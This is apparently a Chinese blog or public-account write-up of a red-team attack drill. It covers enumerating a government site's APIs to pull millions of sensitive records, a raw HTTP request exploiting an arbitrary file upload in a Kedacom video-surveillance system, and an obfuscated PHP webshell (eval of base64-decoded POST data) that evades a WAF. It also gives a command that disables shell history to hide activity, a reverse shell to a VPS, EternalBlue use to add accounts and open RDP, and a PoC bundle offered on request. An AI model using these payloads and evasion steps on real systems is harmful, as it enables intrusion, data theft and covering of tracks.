正文

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

admin
admin V管理员 /0 评论 /8 阅读
0505
文章最后更新时间2025年05月05日,若文章内容或图片失效,请留言反馈!

前言

作为资历混子Web🐶,日常负责端茶倒水之余,浅谈下如何在如今全是大牛子环境下存活,发挥出牛马个人最大价值,Hvv巧妙Nday利用,本文仅此记录学习分享,如若有不对之处,望大佬们指正。

免责声明:

由于传播、利用Polaris本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责。仅记录学习使用。

正文

接口泄露

政务、教育行业作为最常见突破点,寻找学号,工号,弱口令进入后台,sql/文件上传等拿Webshell权限。因此会多人忽略数据泄露分.

某政X单位,注册进入后台,个人信息查询处简单fuzz一下进行后端传参校验碰撞,导致拼接替换参数造成获取X百万敏感信息

https://www.xxx.com/1234/qqquser/detaili?id=xxx

正常查询,替换接口如下:

https://www.xxx.com/1234/qqquser/list?size=1
https://www.xxx.com/1234/qqquser/detaili

缺少参数报错,得到的值为百万级。

https://www.xxx.com/1234/qqquser/exportList?xzqhcode=xxxxxx

且通过接口发现123456处为省份邮政编码,再次替换遍历接口。

重复以上操作,替换邮政编码与ID值,最终获取X百万级敏感信息。

https://github.com/gh0stkey/HaE/https://github.com/gh0stkey/CaA/

(此处推荐插件Hae与CaA,通过数据包正则匹配高亮定位敏感信息,结合CaA收集的参数接口用于方便Fuzz)

Nday积累

往年Hvv前网上都会爆出大量Poc文档、库等,但多数都不太全。或由于漏洞敏感导致后期漏洞已下架等。建议汇总编写整理漏洞库payload自行写成验证工具效率加倍。参考Xray模板,嵌套就行。

(文章末尾整理了近年较全漏洞库)

Kedacom视频监控系统-Nday

某次攻防中碰到的Kedacom视频监控系统任意文件上传。

POST /pmc-bin/upload_fcgi?uploadDir=../&uploadName=aaa.php HTTP/1.1Host: Pragma: no-cacheCache-Control: no-cacheAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryContent-Length: 164----WebKitFormBoundaryContent-Disposition: form-data; name="Filedata": filename="aaa"Content-Type: application/octet-streamtest123----WebKitFormBoundary--
Content-Disposition: form-data; name=="file";filename=1<php<<<<Content-Type: image/jpg<hqiu fang guo%>?=$a=<<<   aaassasssasssasssasssasssasssasssasssasssasssssssssssssaasssassssaa;fwrite(fopen("ppp888.php","a"),'<?php*asas111*/eval/*asas111*/(/*asas111*/base64_decode/*asas111*/(base64ecode/*asas111*/(base64ecode/*asas111*/($_POST/*asas111*/["a"])))/*asas111*/)/*asas111*/:')?>-----------------35803941388997298198758721635Content-Disposition: form-data; name="submit"

存在Waf,天蝎马二次编码后成功上传解析。

绕过思路综合脑图:

进入内网:

遇到Linux系统优先考虑禁用历史命令记录功能:

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 

由于权限较低且操作系统为32位的Linux,反弹shell到VPS,可执行命令。

Tips: 热门内网扫描器无法使用时,可用gogo进行内网扫描。

https://chainreactors.github.io/wiki/gogo/

永恒之蓝:MSF反弹shell易打蓝屏,工具dll注入账号密码,编写把开RDP也加进该dll文件。

https://github.com/abc123info/EquationToolsGUI

添加隧道代理,找到多网卡主机,跨网段。

海康未授权。(Yakit的Fuzz接口好用些。)剩下就常规内网梭哈了,刷完收工。

获取方式

本公众号回复【20250504】即可获取往年Poc汇总整理打包+文中脑图与工具


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网